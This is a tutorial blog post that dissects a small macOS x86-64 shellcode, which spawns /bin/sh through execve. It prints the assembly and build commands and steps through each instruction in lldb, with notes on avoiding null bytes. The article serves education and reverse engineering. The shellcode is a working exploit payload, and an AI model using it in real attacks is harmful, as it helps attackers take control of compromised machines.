Come taste some shellcode...

MacOS Shellcode Primer #1

Abstract

In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.

This is a wonderful way to learn some assembly on MacOS, and introduce some secure software development practices.

Plus, it is fun!

Spawning a shell

This is the shellcode. Where it all begins. This will help us to introduce syscalls and the syscall we'll use the most, execve.

Let's start with some definitions. We'll borrow Wikipedia's:

Syscall

a system call (commonly abbreviated to syscall) is the programmatic way in which a computer program requests a service from the kernel of the operating system on which it is executed. This may include hardware-related services (for example, accessing a hard disk drive or accessing the device's camera), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.

Syscalls are widely used throughout programs - the concept is not strange at all.

Shellcode

a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.

So the "shellcode" is the payload: the code that runs once an exploit has subverted the program. Strictly speaking, the exploit is what gets the payload executed, but the two terms are often used loosely.

As we are talking about Apple MacOS, we'll largely refer to XNU's source code - especially the syscalls.master file.

Let's see the original code.

; 26 bytes execute /bin/sh
;
bits    64
global _main
_main:

    xor     esi, esi         ; esi = 0
    mul     esi              ; eax = 0, edx = 0
    bts     eax, 25          ; eax = 0x02000000
    mov     al, 59           ; rax = sys_execve
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    syscall

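We first observe that the code mixes register widths. e* registers are 32 bits, al is 8 bits, and r* registers are 64 bits. This is not an inconsistency: eax and al are simply the low 32 bits and the low 8 bits of rax, and a write to a 32-bit register clears the upper half of the corresponding 64-bit register. The code assembles, links and runs: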

gbiondo@tripleX Odzhan % nasm -f macho64 shellspawn.asm                                                                       
gbiondo@tripleX Odzhan % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem -o shellspawn shellspawn.o
gbiondo@tripleX Odzhan % ./shellspawn                                                                                         

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$ ps -ef |grep -i bash
    0   695   621   0 Sun12PM ttys000    0:00.03 login -pfl gbiondo /bin/bash -c exec -la zsh /bin/zsh
  503 46117   703   0  2:30PM ttys001    0:00.01 (bash)
  503 46123 46117   0  2:30PM ttys001    0:00.00 grep -i bash
    0 23384   621   0  4:13PM ttys002    0:00.02 login -pfl gbiondo /bin/bash -c exec -la zsh /bin/zsh
bash-3.2$ exit
gbiondo@tripleX Odzhan %

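In the output of the process status command, PID 46117, shown as (bash), is the shell we have just spawned: on macOS, /bin/sh runs bash 3.2 by default, hence the bash-3.2$ prompt. The login ... /bin/bash -c exec -la zsh /bin/zsh lines are the terminal sessions that were already open. In short, the code above spawns a shell.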

To understand what is going on in the program, one should know how parameters are passed to invoked routines and what parameters are required to syscall.

Param. no.   Register   Register name
1            RDI        Destination index register
2            RSI        Source index register
3            RDX        Data register

In detail (these are the historical roles of the registers; for a syscall they simply carry the arguments):

  • Destination index register is used for string, memory array copying and setting, and for far pointer addressing with ES.
  • Source index register is used for string and memory array copying.
  • Data register is used for I/O port access, arithmetic, some interrupt calls. The data register is used in I/O operations as well as preferred in division and multiplication.

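We invoke syscalls by loading into RAX (the accumulator register, which is used for I/O port access, arithmetic, interrupt calls, etc.) the number of the syscall added to 0x2000000, and then executing the syscall instruction. On macOS, 0x2000000 selects the BSD (Unix) class of syscalls, which is where execve lives.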
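As a quick sanity check of that arithmetic, here is a minimal Python sketch. The names SYSCALL_CLASS_UNIX, SYSCALL_CLASS_SHIFT and bsd_syscall_number are used here for illustration only; the only facts taken from the article are the 0x2000000 constant and the number 59 that appears in the shellcode.

```python
# Illustrative sketch: how the value loaded into RAX is composed.
SYSCALL_CLASS_SHIFT = 24   # the class sits in the bits above the syscall number
SYSCALL_CLASS_UNIX = 2     # 2 << 24 == 0x2000000, the constant used in this article


def bsd_syscall_number(number):
    """Return the value to load into RAX for the given BSD syscall number."""
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | number


if __name__ == "__main__":
    print(hex(bsd_syscall_number(59)))  # 59 is the number used by the shellcode
```

Because the syscall number only occupies the low bits, adding it to 0x2000000 and OR-ing it in give the same result.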

Having said this, we need to understand how to find syscall numbers. Here is where syscalls.master comes into play: that is where all the syscalls are defined:

0    AUE_NULL    ALL    { int nosys(void); }   { indirect syscall }
1    AUE_EXIT    ALL    { void exit(int rval) NO_SYSCALL_STUB; }
2    AUE_FORK    ALL    { int fork(void) NO_SYSCALL_STUB; }
3    AUE_NULL    ALL    { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }
4    AUE_NULL    ALL    { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }
[... SNIP ...]
57    AUE_SYMLINK    ALL    { int symlink(char *path, char *link); }
58    AUE_READLINK    ALL    { int readlink(char *path, char *buf, int count); }
59    AUE_EXECVE    ALL    { int execve(char *fname, char **argp, char **envp); }
60    AUE_UMASK    ALL    { int umask(int newmask); }
61    AUE_CHROOT    ALL    { int chroot(user_addr_t path); }
[... SNIP ...]

So the code moves into RAX the value 59, which is linked to the execve syscall. This API requires:

  • fname, which is a pointer to a char array (in plain English: a string)
  • argp, which is a pointer to a pointer to a char array (in plain English: an array of strings)
  • envp, which is a pointer to a pointer to a char array (in plain English: an array of strings)

A quick look at the man page (man 2 execve) gives a clearer explanation. For starters, the signature of this API is:

int execve(const char *path, char *const argv[], char *const envp[]);

and the description states:

execve() transforms the calling process into a new process. The new process is constructed from an ordinary file, whose name is pointed to by path, called the new process file. This file is either an executable object file, or a file of data for an interpreter. An executable object file consists of an identifying header, followed by pages of data representing the initial program (text) and initialized data pages.

[...]

If any optional args are specified, they become the first (second, ...) argument to the interpreter

[...]

The zeroth argument, normally the name of the execve()'d file, is left unchanged.

[...]

The argument argv is a pointer to a null-terminated array of character pointers to null-terminated character strings. These strings construct the argument list to be made available to the new process. At least one argument must be present in the array; by custom, the first element should be the name of the executed program (for example, the last component of path).

[...]

The argument envp is also a pointer to a null-terminated array of character pointers to null-terminated strings. A pointer to this array is normally stored in the global variable environ. These strings pass information to the new process that is not directly an argument to the command (see environ(7)).

[...]

Nuff said. Let's go through the code. The best way to do this is to debug it. We have seen already how this can be done with lldb in a previous article, but first it is meaningful to see the sections of this binary:

objdump --arch=x86_64 -m --section-headers shellspawn

Sections:
Idx Name          Size     VMA              Type
  0 __text        0000001a 0000000100003f9e TEXT
  1 __unwind_info 00000048 0000000100003fb8 DATA

Time to disassemble. As I usually do, I start with a breakpoint in the main routine and disassemble it. The result won't be much different from what we wrote:

(lldb) breakpoint set -name main
Breakpoint 1: where = shellspawn`main, address = 0x0000000100003f9e
(lldb) breakpoint list
Current breakpoints:
1: name = 'main', locations = 1
  1.1: where = shellspawn`main, address = shellspawn[0x0000000100003f9e], unresolved, hit count = 0 

(lldb) disassemble -n main
shellspawn`main:
shellspawn[0x100003f9e] <+0>:  xor    esi, esi
shellspawn[0x100003fa0] <+2>:  mul    esi
shellspawn[0x100003fa2] <+4>:  bts    eax, 0x19
shellspawn[0x100003fa6] <+8>:  mov    al, 0x3b
shellspawn[0x100003fa8] <+10>: movabs rbx, 0x68732f2f6e69622f
shellspawn[0x100003fb2] <+20>: push   rdx
shellspawn[0x100003fb3] <+21>: push   rbx
shellspawn[0x100003fb4] <+22>: push   rsp
shellspawn[0x100003fb5] <+23>: pop    rdi
shellspawn[0x100003fb6] <+24>: syscall

The first operation is an xor that zeroes the ESI register (every value XORed with itself gives zero); since a write to a 32-bit register clears the upper 32 bits of the 64-bit one, RSI is zero too. Then there is the mul instruction. It is the mnemonic for multiply and it has quite a peculiar syntax, because some of its operands are implicit. It performs an unsigned multiplication of an implied operand, the accumulator, by the explicit source operand. With a 32-bit source, as in mul esi, it multiplies EAX by ESI and stores the 64-bit product in EDX:EAX: the low 32 bits in EAX and the high 32 bits in EDX. (With a 64-bit source, mul multiplies RAX by the source and stores the 128-bit product in RDX:RAX.) As ESI is zero, the product is zero, so the instruction at 0x100003fa0 zeroes both RAX and RDX in just two bytes. After the instruction is executed, we have:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fa2 shellspawn`main + 4
shellspawn`main:
->  0x100003fa2 <+4>:  bts    eax, 0x19
    0x100003fa6 <+8>:  mov    al, 0x3b
    0x100003fa8 <+10>: movabs rbx, 0x68732f2f6e69622f
    0x100003fb2 <+20>: push   rdx
Target 0: (shellspawn) stopped.
(lldb) register read RAX RDX RSI
     rax = 0x0000000000000000
     rdx = 0x0000000000000000
     rsi = 0x0000000000000000
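To make the implicit operands concrete, here is a minimal Python model of the 32-bit form of mul. The helper name mul32 is hypothetical; it only mimics the arithmetic, not the flags.

```python
MASK32 = 0xFFFFFFFF


def mul32(eax, src):
    """Model `mul r32`: return (eax, edx), the low and high halves of eax * src."""
    product = (eax & MASK32) * (src & MASK32)   # unsigned 64-bit product
    return product & MASK32, (product >> 32) & MASK32


if __name__ == "__main__":
    # Whatever EAX held before, multiplying by a zeroed ESI clears EAX and EDX.
    print(mul32(0xDEADBEEF, 0))
```

The point of the trick is that one instruction clears two registers, whatever value the accumulator held before.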

The next instruction, bts is bit test and set. It selects the bit in a bit string (specified with the first operand, called the bit base) at the bit-position designated by the bit offset operand (second operand), stores the value of the bit in the CF flag, and sets the selected bit in the bit string to 1.

EAX is a 32-bit register, currently zero, and 0x19 = 25; this means that the result of the operation is all zeros apart from bit 25 (counting from bit 0), which is set to 1: 0000 0010 0000 0000 0000 0000 0000 0000 or 0x02000000. In fact we have:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fa6 shellspawn`main + 8
shellspawn`main:
->  0x100003fa6 <+8>:  mov    al, 0x3b
    0x100003fa8 <+10>: movabs rbx, 0x68732f2f6e69622f
    0x100003fb2 <+20>: push   rdx
    0x100003fb3 <+21>: push   rbx
Target 0: (shellspawn) stopped.
(lldb) register read RAX
     rax = 0x0000000002000000
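The same operation can be sketched in Python. The function name bts and its width parameter are illustrative choices of mine; the model returns the old bit (what would land in CF) together with the updated value.

```python
def bts(value, bit, width=32):
    """Model `bts reg, imm8`: return (carry_flag, new_value)."""
    bit %= width                      # for a register operand the offset wraps at the width
    carry = (value >> bit) & 1        # the previous state of the bit goes to CF
    return carry, value | (1 << bit)  # the bit is then set to 1


if __name__ == "__main__":
    carry, eax = bts(0, 25)
    print(carry, hex(eax))
```

Running bts a second time on the result would leave the value unchanged and report a carry of 1, since the bit is already set.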

The next instruction moves 0x3b into AL, the lowest byte of the RAX/EAX register; in decimal, this is 59, the number of our syscall. A write to AL leaves the other bits of RAX untouched, so after the execution of this instruction we expect that the register RAX will contain 0x000000000200003b; and coherently we have:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fa8 shellspawn`main + 10
shellspawn`main:
->  0x100003fa8 <+10>: movabs rbx, 0x68732f2f6e69622f
    0x100003fb2 <+20>: push   rdx
    0x100003fb3 <+21>: push   rbx
    0x100003fb4 <+22>: push   rsp
Target 0: (shellspawn) stopped.
(lldb) register read EAX
     eax = 0x0200003b
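A small Python sketch of this partial-register write follows. The helper name write_al is hypothetical; the model replaces the low byte and keeps everything above it, which is why the register had to be clean before this step.

```python
def write_al(rax, value):
    """Model `mov al, imm8`: replace bits 0-7 of RAX and keep bits 8-63."""
    return (rax & ~0xFF) | (value & 0xFF)


if __name__ == "__main__":
    print(hex(write_al(0x02000000, 59)))
    # Stale upper bits would survive the write, hence the zeroing done earlier.
    print(hex(write_al(0x1122334455667788, 59)))
```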

So far, the disassembled instructions did not differ from the original ones. Here we have quite a discrepancy: how can mov rbx, '/bin//sh' translate into movabs rbx, 0x68732f2f6e69622f? Well, 68732f2f6e69622f is 16 hex digits, that is 8 bytes, exactly as many as the characters in the string '/bin//sh'. If we translate the value byte by byte into ASCII we have:

68 73 2f 2f 6e 69 62 2f
h s / / n i b /

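which is /bin//sh written backwards. This has to do with the endianness of the x86-64 architecture, which is little-endian: the least significant byte of a value is stored first in memory, so it has to hold the first character of the string. movabs is just the name the disassembler gives to a mov with a 64-bit immediate. In short, this loads the eight bytes of the string into rbx: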

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb2 shellspawn`main + 20
shellspawn`main:
->  0x100003fb2 <+20>: push   rdx
    0x100003fb3 <+21>: push   rbx
    0x100003fb4 <+22>: push   rsp
    0x100003fb5 <+23>: pop    rdi
Target 0: (shellspawn) stopped.
(lldb) register read rbx
     rbx = 0x68732f2f6e69622f
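The conversion between the string and the immediate can be checked with a few lines of Python. The helper names are mine; the only assumption is that the value is laid out in memory in little-endian order.

```python
def imm64_to_bytes(value):
    """Return the 8 bytes of a 64-bit immediate in the order they sit in memory."""
    return value.to_bytes(8, "little")


def bytes_to_imm64(data):
    """Return the 64-bit immediate that stores `data` in memory order."""
    return int.from_bytes(data, "little")


if __name__ == "__main__":
    print(imm64_to_bytes(0x68732F2F6E69622F))
    print(hex(bytes_to_imm64(b"/bin//sh")))
```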

So far, RSI and RDX have been initialised, and RAX holds the syscall code. The only thing left is to set RDI. The next instruction pushes the current value of rdx (0x0) onto the stack; this will become the null terminator of our string.

For starters, before executing the instruction we read the value of the stack pointer register:

(lldb) register read rsp
     rsp = 0x00007ff7bfeff888

and we do the same after the instruction is run:

(lldb) register read rsp
     rsp = 0x00007ff7bfeff880

This also highlights how the stack grows towards lower memory addresses: pushing a 64-bit register decrements RSP by 8.

If we were to examine the memory area pointed to by RSP before the instruction is executed, we'd see:

(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 25 00 00 00 00 00 00 00  .(......%.......
0x7ff7bfeff878: 60 00 0c 00 01 00 00 00 90 f9 ef bf f7 7f 00 00  `...............
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

After the instruction, the eight bytes at 0x7ff7bfeff880 have been overwritten with zeros:

(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 25 00 00 00 00 00 00 00  .(......%.......
0x7ff7bfeff878: 60 00 0c 00 01 00 00 00 00 00 00 00 00 00 00 00  `...............
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

In exactly the same manner, the contents of rbx are pushed onto the stack:

(lldb) register read rbx
     rbx = 0x68732f2f6e69622f
(lldb) s
Process 71654 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb4 shellspawn`main + 22
shellspawn`main:
->  0x100003fb4 <+22>: push   rsp
    0x100003fb5 <+23>: pop    rdi
    0x100003fb6 <+24>: syscall 
    0x100003fb8:       add    dword ptr [rax], eax
Target 0: (shellspawn) stopped.
(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 25 00 00 00 00 00 00 00  .(......%.......
0x7ff7bfeff878: 2f 62 69 6e 2f 2f 73 68 00 00 00 00 00 00 00 00  /bin//sh........
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

and so is rsp, whose value (0x00007ff7bfeff878, the address of the string) lands at 0x7ff7bfeff870:

(lldb) register read rsp
     rsp = 0x00007ff7bfeff878
(lldb) s
Process 71654 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb5 shellspawn`main + 23
shellspawn`main:
->  0x100003fb5 <+23>: pop    rdi
    0x100003fb6 <+24>: syscall 
    0x100003fb8:       add    dword ptr [rax], eax
    0x100003fba:       add    byte ptr [rax], al
Target 0: (shellspawn) stopped.
(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 78 f8 ef bf f7 7f 00 00  .(......x.......
0x7ff7bfeff878: 2f 62 69 6e 2f 2f 73 68 00 00 00 00 00 00 00 00  /bin//sh........
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

Then rdi is loaded from the top of the stack (which contains the value rsp had before it was pushed, 0x00007ff7bfeff878):

(lldb) register read rdi rsp
     rdi = 0x0000000000000001
     rsp = 0x00007ff7bfeff870
(lldb) s
Process 71654 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb6 shellspawn`main + 24
shellspawn`main:
->  0x100003fb6 <+24>: syscall 
    0x100003fb8:       add    dword ptr [rax], eax
    0x100003fba:       add    byte ptr [rax], al
    0x100003fbc:       sbb    al, 0x0
Target 0: (shellspawn) stopped.
(lldb) register read rdi rsp
     rdi = 0x00007ff7bfeff878
     rsp = 0x00007ff7bfeff878

Finally, the syscall is invoked: execve replaces the running program with /bin/sh, and we get our shell.
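The four stack instructions can be replayed with a toy model in Python. This is only a sketch: the stack is a dictionary of 8-byte slots, the starting address is the RSP value seen in the session above, and the helper names are hypothetical.

```python
STACK_TOP = 0x7FF7BFEFF888   # RSP before `push rdx`, taken from the lldb session


def run_stack_setup(rsp=STACK_TOP):
    """Replay push rdx / push rbx / push rsp / pop rdi; return (rdi, rsp, memory)."""
    memory = {}                                   # address -> 8-byte value
    rdx = 0
    rbx = int.from_bytes(b"/bin//sh", "little")

    def push(value):
        nonlocal rsp
        rsp -= 8                                  # the stack grows downwards
        memory[rsp] = value

    def pop():
        nonlocal rsp
        value = memory[rsp]
        rsp += 8
        return value

    push(rdx)    # null terminator
    push(rbx)    # the string, now followed in memory by the terminator
    push(rsp)    # the argument is evaluated first: the value of RSP before the push
    rdi = pop()  # RDI now holds the address of the string
    return rdi, rsp, memory


def c_string_at(memory, address):
    """Read bytes from the toy stack until the first null byte."""
    out = bytearray()
    while True:
        for byte in memory[address].to_bytes(8, "little"):
            if byte == 0:
                return bytes(out)
            out.append(byte)
        address += 8


if __name__ == "__main__":
    rdi, rsp, memory = run_stack_setup()
    print(hex(rdi), hex(rsp), c_string_at(memory, rdi))
```

The model ends with RDI and RSP both pointing at the string, which matches the last register read in the session.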

Strategy

A quick recap of how the shellcode works.

1 - find the syscall number and specification

First of all, syscalls. A quick way to find syscalls is:

gbiondo@tripleX sys % pwd
/Library/Developer/CommandLineTools/SDKs/MacOSX12.3.sdk/System/Library/Frameworks/Kernel.framework/Versions/A/Headers/sys
gbiondo@tripleX sys % cat syscall.h

As we have seen before, once we have the number of the syscall, it is added to 0x02000000, and the resulting value is stored in the EAX/RAX register.

The next stage would be understanding the parameters accepted by the syscall itself. For instance, we see that syscall 4 is SYS_write, or, seen differently (syscalls.master file):

4    AUE_NULL    ALL    { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }

We conjecture that this syscall has 3 parameters: a file descriptor, the address of the buffer, and the size of the string to print. Confirmation comes from man 2 <syscall name>. In this case, a man 2 write would return:

ssize_t write(int fildes, const void *buf, size_t nbyte);

and the subsequent description of the parameters.
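To get a feel for these parameters without writing assembly, one can use Python's os.write, which is a thin wrapper around write(2). In this sketch the helper name write_via_pipe is mine, and a pipe stands in for the terminal so that the bytes can be read back; note that Python takes the length from the bytes object rather than as a separate nbyte argument.

```python
import os


def write_via_pipe(message):
    """Write `message` to a pipe with os.write and read it back."""
    read_fd, write_fd = os.pipe()
    try:
        written = os.write(write_fd, message)   # file descriptor, then the buffer
        return os.read(read_fd, written)        # os.write returned the byte count
    finally:
        os.close(read_fd)
        os.close(write_fd)


if __name__ == "__main__":
    print(write_via_pipe(b"hello\n"))
```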

For shellcode, the most important syscall to know is execve, so let's stick to it. Its description is above. In this example, we simply invoke /bin/sh, so there is no need to use other parameters. In the next article we'll take care of how to run commands with parameters.

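Some of you may have noticed that the author of the blog post where we found the code used the string /bin//sh, with two slashes between the directory and the executable. We'll come back to this later, but the reason is to avoid null bytes: /bin/sh is only seven characters long, so the assembler would pad the eight-byte immediate with a zero byte, whereas /bin//sh fills all eight bytes, and the doubled slash is treated as a single one when the path is resolved.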
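The effect of the extra slash is easy to verify. The sketch below assumes that a string shorter than eight bytes is padded with zero bytes when it is used as a 64-bit immediate; the helper names are hypothetical.

```python
def as_imm64_bytes(path):
    """Pad `path` with zero bytes to the 8 bytes of a 64-bit immediate."""
    if len(path) > 8:
        raise ValueError("the string does not fit in a 64-bit immediate")
    return path.ljust(8, b"\x00")


def has_null_byte(data):
    """Return True if `data` contains at least one zero byte."""
    return b"\x00" in data


if __name__ == "__main__":
    for path in (b"/bin/sh", b"/bin//sh"):
        print(path, has_null_byte(as_imm64_bytes(path)))
```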

2 - Zeroing RSI

This is accomplished by XORing the register with itself. The reason the task hasn't been accomplished with:

mov rsi, 0

is to avoid null bytes. This topic comes up quite frequently, and there's a good reason. For the moment, we religiously accept the dogma "null bytes are the root of all evil" :).
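The difference shows up in the machine code. The byte strings below are hand-assembled for illustration and are not the output of a particular assembler run (an assembler may pick a shorter encoding for the mov, but the zero immediate still produces null bytes). The shellcode bytes follow the offsets shown in the lldb disassembly.

```python
MOV_RSI_0 = bytes.fromhex("48c7c600000000")   # mov rsi, 0 (one possible encoding)
XOR_ESI_ESI = bytes.fromhex("31f6")           # xor esi, esi

SHELLCODE = bytes.fromhex(
    "31f6"                    # xor  esi, esi
    "f7e6"                    # mul  esi
    "0fbae819"                # bts  eax, 25
    "b03b"                    # mov  al, 59
    "48bb2f62696e2f2f7368"    # mov  rbx, '/bin//sh'
    "52"                      # push rdx
    "53"                      # push rbx
    "54"                      # push rsp
    "5f"                      # pop  rdi
    "0f05"                    # syscall
)


def null_offsets(code):
    """Return the offsets of the zero bytes found in `code`."""
    return [offset for offset, byte in enumerate(code) if byte == 0]


if __name__ == "__main__":
    print(null_offsets(MOV_RSI_0), null_offsets(XOR_ESI_ESI))
    print(len(SHELLCODE), null_offsets(SHELLCODE))
```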

3 - Zeroing RAX and RDX

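This is more than good housekeeping :) RDX is the third parameter of execve and must be zero, and the upper bits of RAX must be clean before the syscall number is built in the next step. A single mul esi, with ESI already zero, clears both.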

4 - Setting up RAX

RAX shall contain the number of the syscall. The value 0x02000000 fits in 32 bits, so the author uses EAX instead. Creating that constant means setting bit 25 of a zeroed register to 1. 59 fits in 8 bits, so the author uses AL to store the value - simply moving the number to the register.

Actually the actions taken in points 3- and 4- show an inherent, intrinsic elegance...

5 - The first parameter to execve

The first parameter to execve is stored in the register RDI. It must be a pointer to a null-terminated string containing the path of the executable. This string is built on the stack, and its address is then popped into RDI. This is accomplished by storing the string in a temporary register (rbx), pushing a null terminator onto the stack, and then pushing the string - remember that the stack is LIFO and grows downwards, so the terminator ends up right after the string in memory. At this point RSP points to the string, so pushing RSP and popping it into RDI copies that address into the register.

6 - The second parameter to execve

The second parameter to execve is stored in RSI. It points to the argument list passed to the new program. In our case, the list is empty, and considering that the register has been initialised to 0 in point 2, no further change is required.

7 - The third and last parameter to execve

The last parameter to the syscall is stored in RDX. In point 3 its value has been set to 0. This is coherent: the third parameter is supposed to point to a null-terminated array in which environment variables are passed. In this case, it's an empty list.

Conclusions

This post focused on analysing the "malware" - or better, the shellcode, assuming we know no assembly. Every step has been explained like we had no assembly talent whatsoever - which is good, because this is how we learn to reverse-engineer something.

We will see some more examples, and then obtain a more generic strategy to use when designing shellcode.

See you next time. Have fun!

Support Gabriele Biondo by becoming a sponsor. Any amount is appreciated!